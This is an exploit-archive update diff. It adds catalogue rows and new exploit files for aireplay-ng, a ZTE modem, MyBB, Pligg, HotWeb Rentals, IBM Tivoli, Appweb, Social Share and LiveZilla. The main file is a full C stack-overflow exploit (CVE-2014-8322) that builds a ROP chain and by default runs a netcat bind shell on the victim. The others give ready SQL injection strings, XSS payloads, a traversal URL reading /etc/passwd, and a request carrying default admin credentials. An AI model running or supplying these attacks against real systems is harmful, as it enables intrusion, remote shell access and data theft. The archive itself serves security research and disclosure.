Updated 11_04_2014

files.csv

@@ -31540,6 +31540,7 @@ id,file,description,date,author,platform,type,port
 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 'email.cgi' Cross Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
+35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - ""tcp_test"" Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0
 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0
 35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0
 35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0
@@ -31642,6 +31643,7 @@ id,file,description,date,author,platform,type,port
 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
 35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
+35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0
 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
 35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0
@@ -31650,3 +31652,11 @@ id,file,description,date,author,platform,type,port
 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
+35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
+35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
+35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0
+35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
+35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
+35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
+35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
+35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0

platforms/hardware/webapps/35128.txt

@@ -0,0 +1,23 @@
+# Exploit Title: ZTE Modem Stored XSS Vulnerability
+# Date: 30-10-2014
+# Exploit Author: Ravi Rajput aka Gr3y n00b IHT team
+# Version: ZXDSL 531BIIV7.3.0f_D09_IN
+# Software Link:http://wwwen.zte.com.cn
+#Tested on : Windows 7
+# code :
+
+GET /ntwksum2.cgi?ntwkPrtcl=3&enblService=1&serviceName=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.1/enblbridge.html
+Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657373223a302c226c6f675f616374697665223a307d
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+
+Attack details :
+The variable aerviceName  has been set to simple payload <script>alert(0)</script>
+
+

platforms/linux/remote/35018.c

@@ -0,0 +1,148 @@
+/*
+ * Exploit Title: Aireplay "tcp_test" Length Parameter Inconsistency
+ * Date: 10/3/2014
+ * Exploit Author: Nick Sampanis
+ * Vendor Homepage: http://www.aircrack-ng.org/
+ * Version: Aireplay-ng 1.2 beta3
+ * Tested on: Kali Linux 1.0.9 x64
+ * CVE : CVE-2014-8322
+ * Description: Affected option "aireplay-ng --test"
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <sys/select.h>
+#include <sys/time.h>
+#include <sys/types.h>          /* See NOTES */
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+
+#define __packed __attribute__ ((__packed__))
+struct net_hdr {
+    uint8_t     nh_type;
+    uint32_t    nh_len;
+    uint8_t     nh_data[0];
+}__packed;
+
+#define POP_RDI     "\xb8\x29\x40\x00\x00\x00\x00\x00"
+#define POP_RBX     "\x88\x92\x41\x00\x00\x00\x00\x00"
+#define RPOP_RBX    "\x00\x00\x00\x00\x00\x88\x92\x41"
+#define MOV_TO_RDI  "\xf3\x47\x41\x00\x00\x00\x00\x00"
+#define COMMAND     "nc -l -p 1234 -e /bin/sh\x00"
+#define SYSTEM      "\x50\x23\x40\x00\x00\x00\x00\x00"
+#define PAD_BYTES   1304
+
+unsigned char *exploit_init(char *command, size_t size);
+
+int main(int argc, char *argv[])
+{
+    struct net_hdr rh;
+    struct sockaddr_in server, client;
+    unsigned char *exploit;
+    socklen_t len;
+    size_t size;
+    char *command, exec[1024];
+    int sockfd, cl, val = 1;
+
+    printf("[+]Exploit for aireplay-ng tcp_test remote stack overflow\n");
+    printf("[+]Written by Nick Sampanis CVE-2014-8322\n");
+    if (argc == 1) {
+        fprintf(stderr,"[-]Usage: %s port command\n"
+                "[-][Default %s]\n", argv[0], COMMAND);
+        return -1;
+    }
+    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
+        perror("[-]Socket()");
+        return -1;
+    }
+    memset((char *)&server, '\0', sizeof(server));
+    len = sizeof(server);
+    server.sin_addr.s_addr = 0;
+    server.sin_port = htons(atoi(argv[1]));
+    server.sin_family = AF_INET;
+    if (argv[2])
+        command = argv[2];
+    else
+        command = COMMAND;
+
+    setsockopt(sockfd, SOL_SOCKET,SO_REUSEADDR, &val, sizeof(val));
+    if (bind(sockfd, (struct sockaddr *)&server, sizeof(server)) == -1) {
+        perror("bind()");
+        return -1;
+    }
+    if (listen(sockfd, 5) == -1) {
+        perror("listen()");
+        return -1;
+    }
+    printf("[+]Server is waiting for connections on port %d\n", atoi(argv[1]));
+
+    if (!(size = (strlen(command)+8)*5/4*8+PAD_BYTES+sizeof(rh)))
+        return -1;
+    exploit = exploit_init(command, size);
+    while (1) {
+        if ((cl = accept(sockfd, (struct sockaddr *)&client, &len)) == -1) {
+            perror("[-]Accept");
+            return -1;
+        }
+        printf("[+]Client %s has been connected\n", inet_ntoa(client.sin_addr));
+        if (send(cl, exploit, size, 0) == -1) {
+            perror("[-]Send");
+            return -1;
+        }
+        if (recv(cl, &rh, sizeof(rh), 0) == -1) {
+            perror("[-]Recv");
+            return -1;
+        }
+        close(cl);
+        sleep(1);
+        if (!argv[2]) {
+            printf("[+]Enjoy your shell\n\n");
+            snprintf(exec, sizeof(exec), "nc %s %d", 
+                    inet_ntoa(client.sin_addr), atoi(argv[1]));
+            system(exec);
+        }
+        
+    }
+    close(sockfd);
+    free(exploit);
+
+    return 0;
+}
+
+unsigned char *exploit_init(char *command, size_t size)
+{
+    unsigned long DATA = 0x6265a0;
+    unsigned char *buffer, *exploit;
+    struct net_hdr nh;
+    register int i, j;
+
+    buffer = malloc(size);
+    nh.nh_type = 0x1;
+    nh.nh_len = htonl(size-sizeof(nh));
+    memcpy(buffer, &nh, sizeof(nh));
+    memset(buffer+sizeof(nh), 'A', PAD_BYTES);
+    exploit = buffer+sizeof(nh)+PAD_BYTES;
+
+    for (i = j = 0; j < strlen(command)+4; i+=5) {
+        memcpy(exploit+i*8, POP_RDI, 8);
+        memcpy(exploit+(i+1)*8, &DATA, 8);
+        memcpy(exploit+(i+2)*8, POP_RBX, 8);
+        memcpy(exploit+(i+3)*8, command+j, 8);
+        memcpy(exploit+(i+4)*8, MOV_TO_RDI, 8);
+        DATA += 4;
+        j += 4;
+    }
+    DATA = 0x6265a0; /*.data*/
+    memcpy(exploit+i*8, POP_RDI, 8);
+    memcpy(exploit+(i+1)*8, &DATA, 8); 
+    memcpy(exploit+(i+2)*8, SYSTEM, 8);
+
+    return buffer;
+}
+
+

platforms/linux/remote/35148.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45582/info
+
+IBM Tivoli Access Manager for e-business is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+IBM Tivoli Access Manager for e-business 6.1.1 is vulnerable. 
+
+http://www.example.com/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 

platforms/multiple/remote/35144.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45568/info
+
+Appweb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Appweb 3.2.2-1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/ejs/%3Cscript%3Ealert%281%29%3C/script%3E 

platforms/php/webapps/35140.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45565/info
+
+MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyBB 1.6 is vulnerable; other versions may also be affected. 
+
+POST /mybb/search.php
+
+action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1

platforms/php/webapps/35141.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45565/info
+ 
+MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+MyBB 1.6 is vulnerable; other versions may also be affected. 
+
+POST /mybb/private.php
+
+my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff

platforms/php/webapps/35142.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45566/info
+
+Social Share is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/socialshare/search.php?search=<XSS> 

platforms/php/webapps/35143.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45567/info
+
+HotWeb Scripts HotWeb Rentals is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users 

platforms/php/webapps/35145.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45578/info
+
+Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Pligg CMS 1.1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cloud.php?range={SQL} 

platforms/php/webapps/35149.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45586/info
+
+LiveZilla is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveZilla 3.2.0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/livezilla/server.php?request=track&livezilla=<script>alert(&#039;xss&#039;)</script>